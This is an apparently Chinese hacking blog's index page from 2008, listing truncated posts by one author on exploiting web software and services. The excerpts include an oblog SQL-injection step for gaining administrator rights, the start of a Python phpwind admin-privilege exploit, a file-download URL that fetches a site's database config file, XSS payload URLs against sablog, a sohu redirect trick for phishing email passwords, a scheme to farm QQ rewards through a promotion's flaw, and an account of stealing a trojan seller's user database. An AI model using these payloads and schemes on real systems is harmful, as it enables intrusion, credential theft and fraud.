popphen.net.ru
预览模式: 普通 | 列表

利用Moto的漏洞刷QQ绿钻

作者:天晴无名氏 日期:2008-11-29 18:19


利用Moto的漏洞刷QQ绿钻,希望大家保密,不要外传。
活动有效时间:截止到2008年12月31日
奖品:刷qq绿钻
活动介绍:
今天告诉大家一个刷qq绿钻的方法,我们要用的活动是,MOTO音乐雷达,送手机,送免费qq绿钻,
每天积分的前30名可以获得qq绿钻。我们可以通过刷积分的方式来获得qq绿钻。
获得积分的方法主要有两种:
1、自己答题,普通qq用户最高每天拿100分。qq绿钻用户最高20

[阅读全文]

标签: Moto 漏洞 QQ绿钻
类别: Resources | 引用: 0 | 评论: 0 | 阅读: 37

oblog4.6添加后台管理员漏洞(仅适用于sql版)

作者:天晴无名氏 日期:2008-09-12 13:20

、注册一个用户,用户名script,密码123456

  2、发布一篇日志,日志标题:测试一下

  3、个人前台首页找到日志"测试一下",点"推荐"

  4、个人后台管理,选择"常用"选项中的"推荐日志",然后点"测试一下"日志后面的修改,把摘要内容修改成:

s'/**/WHERE/** /log

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 107

万网虚拟机漏洞,拿某VIP木马所有会员

作者:天晴无名氏 日期:2008-06-20 00:53

昨天群里看到某牛发布某VIP木马所有VIP用户的数据库。。。

想起来偶以前拿了另一个VIP马过程,心里痒痒,打算试试。

上次拿了那个VIP马会员用了WHOIS拿的,不小心公布了出去,结果木马作者直接重新生成了所有用户。

经验教训,这次拿到了绝对不能公布。

这次的VIP验证和灰鸽子的大同小异,都是把用户名密码扔到验证服务器,验证后下载服务端。

所以会发送用户名密码出去。

监听本地通讯,得到地址:ht

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 133

phpwind管理权限泄露漏洞+利用程序

作者:天晴无名氏 日期:2008-06-01 15:23

Python代码 各位大大自己分析写其他版吧
常来http://www.80sec.com

# -*- coding: gb2312 -*-
import urllib2,httplib,sys
httplib.HTTPConnection.debuglevel = 1
cookies = urllib2.HTTPCookieProcessor()
opener = urllib2.build_op

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 153

最新phpwind管理权限泄露漏洞通杀

作者:天晴无名氏 日期:2008-06-01 15:21

漏洞发布:http://www.80sec.com/

漏洞作者:jianxin@80sec.com

漏洞厂商: http://www.phpwind.com/  本漏洞影响phpwind所有版本

漏洞危害:高

漏洞说明:phpwind是国内使用非常广泛的一款程序,由于在程序设计上存在错误,导致任何人可以取得前台管理员及斑主权限,做删除帖子等任意操作

利用方式:http://www.80sec.co

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 134

利用sohu网站URL跳转漏洞欺骗邮箱密码

作者:天晴无名氏 日期:2008-05-30 16:16

作者:空虚浪子心[XGC]

url跳转漏洞遍布各大网站,简单看一下,THE9、sohu等居然都存在这个漏洞!我们就拿sohu为例,讲一下该漏洞。来到sohu的用户注册页面,可以看到,在IE地址栏里,默认写着http://passport.sohu.com/web/signup.jsp?appid=1000& ru=http://login.mail.sohu.com/reg/signup_

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 144

从ACDSee的漏洞看木马入侵新思路

作者:天晴无名氏 日期:2008-04-29 23:02

来源:中关村在线

对于ACDSee的大名,想必各位都不陌生。不过最近ACDSee所使用的ID_X.apl、IDE_ACDStd.apl、ID_PSP.ap和AM_LHA.apl插件在处理XBM/XPM/PSP/LHA文件时出现缓冲区溢出漏洞,如果用户打开了带有超长字符串的XBM/XPM/PSP/LHA文件的话,就可能触发这些溢出,导致执行任意指令。

    本次提到的漏洞

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 174

Microsoft IE数据流处理远程代码执行漏洞

作者:天晴无名氏 日期:2008-04-15 15:48

【赛迪网-IT技术报道】IE在处理数据流时存在漏洞,远程攻击者可能利用此漏洞控制用户系统。

发布日期:2008-04-08

更新日期:2008-04-09

受影响系统:

Microsoft Internet Explorer 7.0

Microsoft Internet Explorer 6.0 SP1

Microsoft Internet Explorer 6.0

Microsoft Internet Exp

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 313

oblog文件下载漏洞

作者:天晴无名氏 日期:2008-04-04 20:20

oblog文件下载漏洞
漏洞存在版本4.6sql+access,一路跟踪下去吧
漏洞文件:attachment.asp
利用很简单:http://test.cn/attachment.asp?path=./conn.asp 即可下载CONN
<!-- #include file="inc/inc_syssite.asp" -->
<%
Dim Path,rs

[阅读全文]

类别: Articles | 引用: 0 | 评论: 0 | 阅读: 209

sablog 1.6 多个跨站漏洞

作者:天晴无名氏 日期:2008-03-29 10:44

Date:2008-03-27
Author:amxku[c.r.s.t]
Version:sablog 1.6

由于过滤不严,存在多个跨站漏洞

PS:
http://www.amxku.net/?viewmode=list&curl=>"><ScRiPt%20%0a%0d>alert(amxku)%3B</ScRiPt>
http://www.a

[阅读全文]

标签: sablog 漏洞
类别: Articles | 引用: 0 | 评论: 0 | 阅读: 177